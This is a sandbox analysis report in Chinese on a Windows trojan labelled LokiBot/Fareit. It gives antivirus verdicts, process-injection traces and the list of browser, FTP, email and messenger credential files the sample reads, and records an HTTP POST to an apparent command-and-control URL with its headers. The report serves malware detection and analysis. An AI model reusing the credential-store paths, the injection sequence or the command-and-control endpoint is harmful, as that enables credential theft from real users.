12.0
0-day
55 个模型检测该样本为恶意!
重新分析
更多

b0a3648ec84dce490a5058c8338ff6c7532d8221d9022807601555afd4242d9c

86ae70801f79bf370480af1c7fc9a288.exe

分析耗时

92s

最近分析

文件大小

739.5KB
静态报毒 动态报毒 100% AGEN AI SCORE=83 BTZHCZ CLASSIC CONFIDENCE DELF DELPHILESS ELDORADO ELKP FAREIT GENERICKD GENETIC HIGH CONFIDENCE HKCZXW IGENT KRYPTIK LOKIBOT PUTTY R + MAL R06EC0DI220 SCORE SIGGEN9 SUSGEN TSCOPE UG0@ACSZTQOI UNSAFE X2059 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/LokiBot.9c2ed31f 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20201229 21.1.5827.0
Kingsoft 20201229 2017.9.26.565
McAfee Fareit-FSK!86AE70801F79 20201229 6.0.6.653
Tencent 20201229 1.0.0.1
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619685953.29725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619685946.93825
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619685946.20325
__exception__
stacktrace: 
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 35848000
registers.edi: 0
registers.eax: 0
registers.ebp: 35848072
registers.edx: 45
registers.ebx: 0
registers.esi: 0
registers.ecx: 203
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 64 e9 f7 79 f8
exception.symbol: 86ae70801f79bf370480af1c7fc9a288+0x7bd74
exception.instruction: div eax
exception.module: 86ae70801f79bf370480af1c7fc9a288.exe
exception.exception_code: 0xc0000094
exception.offset: 507252
exception.address: 0x47bd74
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://mahetechasia.com/data/five/fre.php
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:422249819&cup2hreq=a1af95e999d9b8ce8547f703ce1f8b930e1401175549d1c1adfad6efffb1a3da
Performs some HTTP requests (2 个事件)
request POST http://mahetechasia.com/data/five/fre.php
request POST https://update.googleapis.com/service/update2?cup2key=10:422249819&cup2hreq=a1af95e999d9b8ce8547f703ce1f8b930e1401175549d1c1adfad6efffb1a3da
Sends data using the HTTP POST Method (2 个事件)
request POST http://mahetechasia.com/data/five/fre.php
request POST https://update.googleapis.com/service/update2?cup2key=10:422249819&cup2hreq=a1af95e999d9b8ce8547f703ce1f8b930e1401175549d1c1adfad6efffb1a3da
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619685945.84425
NtAllocateVirtualMemory
process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619685946.20325
NtAllocateVirtualMemory
process_identifier: 944
region_size: 53248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00550000
success 0 0
1619685946.21925
NtAllocateVirtualMemory
process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01ec0000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 个事件)
The binary likely contains encrypted or compressed data indicative of a packer (3 个事件)
entropy 7.581120730598689 section {'size_of_data': '0x0000e200', 'virtual_address': '0x0007d000', 'entropy': 7.581120730598689, 'name': 'DATA', 'virtual_size': '0x0000e184'} description A section with a high entropy has been found
entropy 7.2535168497521 section {'size_of_data': '0x00024400', 'virtual_address': '0x0009b000', 'entropy': 7.2535168497521, 'name': '.rsrc', 'virtual_size': '0x000243d8'} description A section with a high entropy has been found
entropy 0.2728503723764387 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 113.108.239.196
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 944 called NtSetContextThread to modify thread in remote process 196
Time & API Arguments Status Return Repeated
1619685946.29725
NtSetContextThread
thread_handle: 0x00000118
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 196
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 944 resumed a thread in remote process 196
Time & API Arguments Status Return Repeated
1619685946.34425
NtResumeThread
thread_handle: 0x00000118
suspend_count: 1
process_identifier: 196
success 0 0
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 172.217.24.14:443
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619685946.26625
CreateProcessInternalW
thread_identifier: 192
thread_handle: 0x00000118
process_identifier: 196
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\86ae70801f79bf370480af1c7fc9a288.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619685946.26625
NtUnmapViewOfSection
process_identifier: 196
region_size: 4096
process_handle: 0x0000011c
base_address: 0x00400000
success 0 0
1619685946.26625
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 196
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x0000011c
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619685946.29725
NtGetContextThread
thread_handle: 0x00000118
success 0 0
1619685946.29725
NtSetContextThread
thread_handle: 0x00000118
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 196
success 0 0
1619685946.34425
NtResumeThread
thread_handle: 0x00000118
suspend_count: 1
process_identifier: 196
success 0 0
1619685948.48425
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 196
success 0 0
File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.33673147
FireEye Generic.mg.86ae70801f79bf37
ALYac Trojan.GenericKD.33673147
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 005662ab1 )
Alibaba Trojan:Win32/LokiBot.9c2ed31f
K7GW Trojan ( 005662ab1 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D201CFBB
BitDefenderTheta Gen:NN.ZelphiF.34700.UG0@aCsZtqoi
Cyren W32/Fareit.JO.gen!Eldorado
Symantec Trojan.Gen.2
APEX Malicious
Avast Win32:Trojan-gen
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.33673147
NANO-Antivirus Trojan.Win32.Fareit.hkczxw
Paloalto generic.ml
Rising Trojan.Injector!1.C7A4 (CLASSIC)
Ad-Aware Trojan.GenericKD.33673147
Sophos Mal/Generic-R + Mal/Fareit-AA
F-Secure Heuristic.HEUR/AGEN.1133569
DrWeb Trojan.Siggen9.41572
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0DI220
McAfee-GW-Edition BehavesLike.Win32.Dropper.bh
Emsisoft Trojan.GenericKD.33673147 (B)
Jiangmin Trojan.Kryptik.aww
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1133569
MAX malware (ai score=83)
Antiy-AVL Trojan/Win32.Lokibot
Gridinsoft Trojan.Win32.LokiBot.ba!s1
Microsoft PWS:Win32/Fareit.AR!MTB
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.33673147
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
McAfee Fareit-FSK!86AE70801F79
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack.DLF
Zoner Trojan.Win32.90567
ESET-NOD32 Win32/PSW.Fareit.L
TrendMicro-HouseCall TROJ_GEN.R06EC0DI220
Yandex Trojan.Igent.bTzHcz.16
Ikarus Trojan.Inject
eGambit Unsafe.AI_Score_87%
Fortinet W32/Injector.ELKP!tr
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x48d18c VirtualFree
0x48d190 VirtualAlloc
0x48d194 LocalFree
0x48d198 LocalAlloc
0x48d19c GetVersion
0x48d1a0 GetCurrentThreadId
0x48d1ac VirtualQuery
0x48d1b0 WideCharToMultiByte
0x48d1b8 MultiByteToWideChar
0x48d1bc lstrlenA
0x48d1c0 lstrcpynA
0x48d1c4 LoadLibraryExA
0x48d1c8 GetThreadLocale
0x48d1cc GetStartupInfoA
0x48d1d0 GetProcAddress
0x48d1d4 GetModuleHandleA
0x48d1d8 GetModuleFileNameA
0x48d1dc GetLocaleInfoA
0x48d1e0 GetLastError
0x48d1e8 GetCommandLineA
0x48d1ec FreeLibrary
0x48d1f0 FindFirstFileA
0x48d1f4 FindClose
0x48d1f8 ExitProcess
0x48d1fc ExitThread
0x48d200 CreateThread
0x48d204 WriteFile
0x48d20c RtlUnwind
0x48d210 RaiseException
0x48d214 GetStdHandle
Library user32.dll:
0x48d21c GetKeyboardType
0x48d220 LoadStringA
0x48d224 MessageBoxA
0x48d228 CharNextA
Library advapi32.dll:
0x48d230 RegQueryValueExA
0x48d234 RegOpenKeyExA
0x48d238 RegCloseKey
Library oleaut32.dll:
0x48d240 SysFreeString
0x48d244 SysReAllocStringLen
0x48d248 SysAllocStringLen
Library kernel32.dll:
0x48d250 TlsSetValue
0x48d254 TlsGetValue
0x48d258 LocalAlloc
0x48d25c GetModuleHandleA
Library advapi32.dll:
0x48d264 RegQueryValueExA
0x48d268 RegOpenKeyExA
0x48d26c RegCloseKey
Library kernel32.dll:
0x48d274 lstrlenA
0x48d278 lstrcpyA
0x48d27c lstrcmpA
0x48d280 WriteFile
0x48d284 WaitForSingleObject
0x48d28c VirtualQuery
0x48d290 VirtualAlloc
0x48d294 Sleep
0x48d298 SizeofResource
0x48d29c SetThreadLocale
0x48d2a0 SetFilePointer
0x48d2a4 SetEvent
0x48d2a8 SetErrorMode
0x48d2ac SetEndOfFile
0x48d2b4 ResumeThread
0x48d2b8 ResetEvent
0x48d2bc ReleaseMutex
0x48d2c0 ReadFile
0x48d2c4 MultiByteToWideChar
0x48d2c8 MulDiv
0x48d2cc LockResource
0x48d2d0 LoadResource
0x48d2d4 LoadLibraryA
0x48d2e0 GlobalUnlock
0x48d2e4 GlobalReAlloc
0x48d2e8 GlobalHandle
0x48d2ec GlobalLock
0x48d2f0 GlobalFree
0x48d2f4 GlobalFindAtomA
0x48d2f8 GlobalDeleteAtom
0x48d2fc GlobalAlloc
0x48d300 GlobalAddAtomA
0x48d308 GetVersionExA
0x48d30c GetVersion
0x48d310 GetTickCount
0x48d314 GetThreadLocale
0x48d31c GetSystemTime
0x48d320 GetSystemInfo
0x48d324 GetStringTypeExA
0x48d328 GetStdHandle
0x48d32c GetProcAddress
0x48d330 GetModuleHandleA
0x48d334 GetModuleFileNameA
0x48d338 GetLogicalDrives
0x48d33c GetLocaleInfoA
0x48d340 GetLocalTime
0x48d344 GetLastError
0x48d348 GetFullPathNameA
0x48d34c GetFileAttributesA
0x48d350 GetExitCodeThread
0x48d354 GetDriveTypeA
0x48d358 GetDiskFreeSpaceA
0x48d35c GetDateFormatA
0x48d360 GetCurrentThreadId
0x48d364 GetCurrentProcessId
0x48d36c GetCPInfo
0x48d370 GetACP
0x48d374 FreeResource
0x48d37c InterlockedExchange
0x48d384 FreeLibrary
0x48d388 FormatMessageA
0x48d38c FindResourceA
0x48d390 FindNextFileA
0x48d398 FindFirstFileA
0x48d3a4 FindClose
0x48d3b4 ExitThread
0x48d3b8 EnumCalendarInfoA
0x48d3c4 CreateThread
0x48d3c8 CreateMutexA
0x48d3cc CreateFileA
0x48d3d0 CreateEventA
0x48d3d4 CompareStringA
0x48d3d8 CloseHandle
Library mpr.dll:
0x48d3e0 WNetGetConnectionA
Library version.dll:
0x48d3e8 VerQueryValueA
0x48d3f0 GetFileVersionInfoA
Library gdi32.dll:
0x48d3f8 UnrealizeObject
0x48d3fc StretchBlt
0x48d400 SetWindowOrgEx
0x48d404 SetViewportOrgEx
0x48d408 SetTextColor
0x48d40c SetStretchBltMode
0x48d410 SetROP2
0x48d414 SetPixel
0x48d418 SetDIBColorTable
0x48d41c SetBrushOrgEx
0x48d420 SetBkMode
0x48d424 SetBkColor
0x48d428 SelectPalette
0x48d42c SelectObject
0x48d430 SaveDC
0x48d434 RestoreDC
0x48d438 Rectangle
0x48d43c RectVisible
0x48d440 RealizePalette
0x48d444 Polyline
0x48d448 PatBlt
0x48d44c MoveToEx
0x48d450 MaskBlt
0x48d454 LineTo
0x48d458 IntersectClipRect
0x48d45c GetWindowOrgEx
0x48d460 GetTextMetricsA
0x48d46c GetStockObject
0x48d470 GetPixel
0x48d474 GetPaletteEntries
0x48d478 GetObjectA
0x48d47c GetDeviceCaps
0x48d480 GetDIBits
0x48d484 GetDIBColorTable
0x48d488 GetDCOrgEx
0x48d490 GetClipBox
0x48d494 GetBrushOrgEx
0x48d498 GetBitmapBits
0x48d49c ExtTextOutA
0x48d4a0 ExcludeClipRect
0x48d4a4 DeleteObject
0x48d4a8 DeleteDC
0x48d4ac CreateSolidBrush
0x48d4b0 CreatePenIndirect
0x48d4b4 CreatePalette
0x48d4bc CreateFontIndirectA
0x48d4c0 CreateDIBitmap
0x48d4c4 CreateDIBSection
0x48d4c8 CreateCompatibleDC
0x48d4d0 CreateBrushIndirect
0x48d4d4 CreateBitmap
0x48d4d8 BitBlt
Library user32.dll:
0x48d4e0 CreateWindowExA
0x48d4e4 WindowFromPoint
0x48d4e8 WinHelpA
0x48d4ec WaitMessage
0x48d4f0 UpdateWindow
0x48d4f4 UnregisterClassA
0x48d4f8 UnhookWindowsHookEx
0x48d4fc TranslateMessage
0x48d504 TrackPopupMenu
0x48d50c ShowWindow
0x48d510 ShowScrollBar
0x48d514 ShowOwnedPopups
0x48d518 ShowCursor
0x48d51c SetWindowsHookExA
0x48d520 SetWindowTextA
0x48d524 SetWindowPos
0x48d528 SetWindowPlacement
0x48d52c SetWindowLongA
0x48d530 SetTimer
0x48d534 SetScrollRange
0x48d538 SetScrollPos
0x48d53c SetScrollInfo
0x48d540 SetRect
0x48d544 SetPropA
0x48d548 SetParent
0x48d54c SetMenuItemInfoA
0x48d550 SetMenu
0x48d554 SetForegroundWindow
0x48d558 SetFocus
0x48d55c SetCursor
0x48d560 SetClassLongA
0x48d564 SetCapture
0x48d568 SetActiveWindow
0x48d56c SendMessageA
0x48d570 ScrollWindow
0x48d574 ScreenToClient
0x48d578 RemovePropA
0x48d57c RemoveMenu
0x48d580 ReleaseDC
0x48d584 ReleaseCapture
0x48d590 RegisterClassA
0x48d594 RedrawWindow
0x48d598 PtInRect
0x48d59c PostQuitMessage
0x48d5a0 PostMessageA
0x48d5a4 PeekMessageA
0x48d5a8 OffsetRect
0x48d5ac OemToCharA
0x48d5b4 MessageBoxA
0x48d5b8 MapWindowPoints
0x48d5bc MapVirtualKeyA
0x48d5c0 LoadStringA
0x48d5c4 LoadKeyboardLayoutA
0x48d5c8 LoadIconA
0x48d5cc LoadCursorA
0x48d5d0 LoadBitmapA
0x48d5d4 KillTimer
0x48d5d8 IsZoomed
0x48d5dc IsWindowVisible
0x48d5e0 IsWindowEnabled
0x48d5e4 IsWindow
0x48d5e8 IsRectEmpty
0x48d5ec IsIconic
0x48d5f0 IsDialogMessageA
0x48d5f4 IsChild
0x48d5f8 InvalidateRect
0x48d5fc IntersectRect
0x48d600 InsertMenuItemA
0x48d604 InsertMenuA
0x48d608 InflateRect
0x48d610 GetWindowTextA
0x48d614 GetWindowRect
0x48d618 GetWindowPlacement
0x48d61c GetWindowLongA
0x48d620 GetWindowDC
0x48d624 GetTopWindow
0x48d628 GetSystemMetrics
0x48d62c GetSystemMenu
0x48d630 GetSysColorBrush
0x48d634 GetSysColor
0x48d638 GetSubMenu
0x48d63c GetScrollRange
0x48d640 GetScrollPos
0x48d644 GetScrollInfo
0x48d648 GetPropA
0x48d64c GetParent
0x48d650 GetWindow
0x48d654 GetMessagePos
0x48d658 GetMenuStringA
0x48d65c GetMenuState
0x48d660 GetMenuItemInfoA
0x48d664 GetMenuItemID
0x48d668 GetMenuItemCount
0x48d66c GetMenuDefaultItem
0x48d670 GetMenu
0x48d674 GetLastActivePopup
0x48d678 GetKeyboardState
0x48d680 GetKeyboardLayout
0x48d684 GetKeyState
0x48d688 GetKeyNameTextA
0x48d68c GetIconInfo
0x48d690 GetForegroundWindow
0x48d694 GetFocus
0x48d698 GetDesktopWindow
0x48d69c GetDCEx
0x48d6a0 GetDC
0x48d6a4 GetCursorPos
0x48d6a8 GetCursor
0x48d6ac GetClientRect
0x48d6b0 GetClassNameA
0x48d6b4 GetClassInfoA
0x48d6b8 GetCapture
0x48d6bc GetActiveWindow
0x48d6c0 FrameRect
0x48d6c4 FindWindowA
0x48d6c8 FillRect
0x48d6cc EqualRect
0x48d6d0 EnumWindows
0x48d6d4 EnumThreadWindows
0x48d6d8 EndPaint
0x48d6dc EnableWindow
0x48d6e0 EnableScrollBar
0x48d6e4 EnableMenuItem
0x48d6e8 DrawTextA
0x48d6ec DrawMenuBar
0x48d6f0 DrawIconEx
0x48d6f4 DrawIcon
0x48d6f8 DrawFrameControl
0x48d6fc DrawFocusRect
0x48d700 DrawEdge
0x48d704 DispatchMessageA
0x48d708 DestroyWindow
0x48d70c DestroyMenu
0x48d710 DestroyIcon
0x48d714 DestroyCursor
0x48d718 DeleteMenu
0x48d71c DefWindowProcA
0x48d720 DefMDIChildProcA
0x48d724 DefFrameProcA
0x48d728 CreatePopupMenu
0x48d72c CreateMenu
0x48d730 CreateIcon
0x48d734 ClientToScreen
0x48d73c CheckMenuItem
0x48d740 CallWindowProcA
0x48d744 CallNextHookEx
0x48d748 BeginPaint
0x48d74c CharNextA
0x48d750 CharLowerBuffA
0x48d754 CharLowerA
0x48d758 CharUpperBuffA
0x48d75c CharToOemA
0x48d760 AdjustWindowRectEx
Library kernel32.dll:
0x48d76c Sleep
Library oleaut32.dll:
0x48d774 SafeArrayPtrOfIndex
0x48d778 SafeArrayGetUBound
0x48d77c SafeArrayGetLBound
0x48d780 SafeArrayCreate
0x48d784 VariantChangeType
0x48d788 VariantCopy
0x48d78c VariantClear
0x48d790 VariantInit
Library ole32.dll:
0x48d798 OleUninitialize
0x48d79c OleInitialize
0x48d7a0 CoTaskMemAlloc
0x48d7a4 CoCreateInstance
0x48d7a8 CoUninitialize
0x48d7ac CoInitialize
Library oleaut32.dll:
0x48d7b4 GetErrorInfo
0x48d7b8 SysFreeString
Library comctl32.dll:
0x48d7c8 ImageList_Write
0x48d7cc ImageList_Read
0x48d7dc ImageList_DragMove
0x48d7e0 ImageList_DragLeave
0x48d7e4 ImageList_DragEnter
0x48d7e8 ImageList_EndDrag
0x48d7ec ImageList_BeginDrag
0x48d7f0 ImageList_Remove
0x48d7f4 ImageList_DrawEx
0x48d7f8 ImageList_Draw
0x48d808 ImageList_Add
0x48d810 ImageList_Destroy
0x48d814 ImageList_Create
0x48d818 InitCommonControls
Library shell32.dll:
0x48d820 ShellExecuteExA
0x48d824 ShellExecuteA
0x48d828 SHGetFileInfoA
Library shell32.dll:
0x48d834 SHGetMalloc
0x48d838 SHGetDesktopFolder

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49186 203.208.40.34 update.googleapis.com 443
192.168.56.101 49188 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49179 50.17.5.224 mahetechasia.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57236 114.114.114.114 53
192.168.56.101 58970 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53210 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 54178 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://mahetechasia.com/data/five/fre.php 
POST /data/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mahetechasia.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 902AECAC
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.